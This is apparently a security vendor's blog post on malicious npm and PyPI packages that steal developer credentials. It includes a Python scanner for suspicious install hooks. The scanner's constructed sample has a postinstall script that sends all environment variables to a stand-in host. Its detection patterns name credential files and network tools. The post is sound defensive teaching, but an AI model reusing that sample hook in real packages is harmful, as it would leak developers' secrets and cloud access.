
Hackers Are Weaponizing Open-Source SW

Hackers can contribute, and do contribute, to open-source projects, but their contributions are not benign.

Open-source software, including AI code generators, is the mainstay of software development. It saves time and money.

In the second quarter of 2025, data exfiltration remained the top priority for attackers looking to quietly compromise developer environments from the inside out.

In the newest report, Sonatype uncovered 16,279 new pieces of malicious code lurking inside public software repositories like npm and PyPI, bringing the running total to over 845,000.

Hackers hide malicious code inside everyday software libraries that developers use, aiming to steal sensitive information from build systems and CI/CD pipelines. Fifty-five percent of all packages identified were aimed at data exfiltration.

This trend marks another chapter in an escalating arms race inside the software supply chain, where developers, and not the end users, have become the front-line targets, with the attackers stealing credentials and API keys. Specifically, they are going after:

  • git credentials
  • AWS secrets
  • Environment variables
  • CI/CD tokens

If they “acquire” these, your customer’s cloud accounts, APIs, databases and internal systems are compromised.
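One place install-time credential theft tends to be wired in is an npm lifecycle hook (preinstall, install, postinstall), which runs automatically on `npm install` and therefore inside every developer machine and CI runner that pulls the package. The scanner below is an added example written for this post, not code from Sonatype or Cybernews: it reads a package manifest, reports every lifecycle hook, follows the hook to any local script it references, and flags indicators of the pattern described above (reading environment variables or credential files, then sending data over the network). The manifest, the `setup.js` body, the `example.invalid` host and the indicator list are all constructed for the demonstration.

```python
"""Flag npm lifecycle hooks that show signs of harvesting secrets from a build
environment. Added example for this post; the sample package is constructed."""
import json
import re
import shlex

# npm runs these hooks automatically during `npm install`, so they are the
# usual place an install-time payload is attached.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicator categories (constructed for this example), each a regex over the
# hook command plus the source of any local script it runs.
INDICATORS = {
    "reads_env": re.compile(r"process\.env\b"),
    "credential_files": re.compile(
        r"\.(git-credentials|aws/credentials|npmrc|netrc|docker/config\.json)\b"),
    "network_send": re.compile(r"\b(request|fetch|post)\s*\(|\b(curl|wget)\b"),
    "shell_exec": re.compile(r"child_process|\b(exec|execSync|spawn)\s*\("),
    "obfuscation": re.compile(
        r"\beval\s*\(|new Function\s*\(|fromCharCode|\batob\s*\(|Buffer\.from\([^)]*'base64'"),
}


def _referenced_sources(command: str, files: dict[str, str]) -> list[str]:
    """Return the package-local files a hook command invokes (e.g. `node ./setup.js`)."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        tokens = command.split()
    found = []
    for tok in tokens:
        name = tok[2:] if tok.startswith("./") else tok
        if name in files:
            found.append(name)
    return found


def scan_package(package_json: str, files: dict[str, str]) -> list[dict]:
    """Report every lifecycle hook in the manifest with the indicators it triggers.

    `files` maps package-relative paths to file contents, so the scan also covers
    a script the hook hands off to. A hook with no indicators is still reported
    (severity "info"): code that runs at install time deserves a look regardless.
    """
    manifest = json.loads(package_json)
    findings = []
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        sources = _referenced_sources(command, files)
        text = command + "\n" + "\n".join(files[s] for s in sources)
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        # Secrets being read AND a way to send them out is the exfiltration shape.
        exfil = "network_send" in hits and bool({"reads_env", "credential_files"} & set(hits))
        findings.append({
            "hook": hook,
            "command": command,
            "files": sources,
            "indicators": hits,
            "severity": "high" if exfil else ("medium" if hits else "info"),
        })
    return findings


# Constructed sample: a package whose postinstall hook runs a local script that
# bundles the environment and hands it to an HTTPS request (host is a reserved
# .invalid name, so the snippet cannot reach anything).
SAMPLE_MANIFEST = json.dumps({
    "name": "example-utils",
    "version": "4.2.0",
    "scripts": {"postinstall": "node ./setup.js", "test": "jest"},
})
SAMPLE_FILES = {
    "setup.js": (
        "// constructed sample script for the scanner demo\n"
        "const secrets = { env: process.env };\n"
        "require('https').request({ host: 'example.invalid' }).end(JSON.stringify(secrets));\n"
    ),
}

# Constructed benign package for contrast: build and test scripts only.
BENIGN_MANIFEST = json.dumps({
    "name": "tidy-lib",
    "version": "1.0.0",
    "scripts": {"build": "tsc", "test": "jest"},
})

if __name__ == "__main__":
    for finding in scan_package(SAMPLE_MANIFEST, SAMPLE_FILES):
        print(json.dumps(finding, indent=2))
    print("benign package findings:", scan_package(BENIGN_MANIFEST, {}))
```

In practice you would run this over the extracted tarball of each dependency before it is installed (for example in a registry proxy or a pre-install CI step) and treat any "high" finding as a block, not a warning. The regexes are deliberately simple; their job is triage, and a package that trips them should be read by a person.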

This is not a theoretical problem; it is out there in the real world.

Many times the packages do not come with source code, which makes them even harder to validate. It is possible, but it is not free.

If you do not have a program to validate code from any third party, you should contact us today.

Credit: Cybernews
